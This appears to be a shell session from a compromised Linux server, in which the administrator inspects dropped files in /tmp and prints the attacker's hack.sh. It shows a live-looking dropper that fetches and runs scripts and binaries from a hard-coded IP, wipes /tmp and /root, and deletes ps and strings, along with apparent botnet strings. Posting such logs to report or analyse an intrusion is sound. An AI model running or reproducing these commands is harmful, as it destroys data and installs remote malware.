server:~# ls /tmp
? bb busybox dd ll mm oo
cat /tmp/busybox
<бинарный файл>
>%$#%d.%d.%d.%d%d.%d.%d.0ogin:
assword:ncorrectsh
cd /tmp || cd /var/run;rm -f *;busybox wget http://69.30.225.250/hack.sh;sh hack.sh;busybox rm -rf hack.sh;busybox tftp -r tftp.sh -g 69.30.225.250;sh tftp.sh; rm -rf tftp.sh
/bin/busybox;echo -e '\147\141\171\146\147\164'
gayfgtulti-callREPORT %s:%s:%sREPORT %s:%s:
<бинарный файл>
server:~# wget http://69.30.225.250/hack.sh -O-
--2015-10-18 21:59:14-- http://69.30.225.250/hack.sh
Подключение к 69.30.225.250:80... соединение установлено.
HTTP-запрос отправлен. Ожидание ответа... 200 OK
Длина: 1548 (1,5K) [text/x-sh]
Сохранение в каталог: ««STDOUT»».
0% [ ] 0 --.-K/s #!/bin/bash
busybox rm -rf /tmp/*
busybox rm -rf /root/*
busybox rm -rf /usr/bin/strings
busybox rm -fr /usr/bin/ps
cd /tmp; busybox wget http://69.30.225.250/bb; busybox chmod +x bb; ./bb; busybox rm -f bb*
cd /tmp; busybox wget http://69.30.225.250/dd; busybox chmod +x dd; ./dd; busybox rm -f dd*
cd /tmp; busybox wget http://69.30.225.250/oo; busybox chmod +x oo; ./oo; busybox rm -f oo*
cd /tmp; busybox wget http://69.30.225.250/ll; busybox chmod +x ll; ./ll; busybox rm -f ll*
cd /tmp; busybox wget http://69.30.225.250/mm; busybox chmod +x mm; ./mm; busybox rm -f mm*
cd /tmp; busybox wget http://69.30.225.250/bb; busybox cp /bin/busybox ./; busybox cat bb > busybox; busybox rm -f bb; busybox cp busybox bb; busybox rm -f busybox; ./bb; busybox rm -f bb*
cd /tmp; busybox wget http://69.30.225.250/dd; busybox cp /bin/busybox ./; busybox cat dd > busybox; busybox rm -f dd; busybox cp busybox dd; busybox rm -f busybox; ./dd; busybox rm -f dd*
cd /tmp; busybox wget http://69.30.225.250/oo; busybox cp /bin/busybox ./; busybox cat oo > busybox; busybox rm -f oo; busybox cp busybox oo; busybox rm -f busybox; ./oo; busybox rm -f oo*
cd /tmp; busybox wget http://69.30.225.250/ll; busybox cp /bin/busybox ./; busybox cat ll > busybox; busybox rm -f ll; busybox cp busybox ll; busybox rm -f busybox; ./ll; busybox rm -f ll*
cd /tmp; busybox wget http://69.30.225.250/mm; busybox cp /bin/busybox ./; busybox cat mm > busybox; busybox rm -f mm; busybox cp busybox mm; busybox rm -f busybox; ./mm; busybox rm -f mm*
rm -f bin*
100%[===================================================================================================================================================================================================>] 1 548 --.-K/s за 0s
2015-10-18 21:59:14 (81,9 MB/s) - written to stdout [1548/1548]
server:~#
Понятно, что опять взломали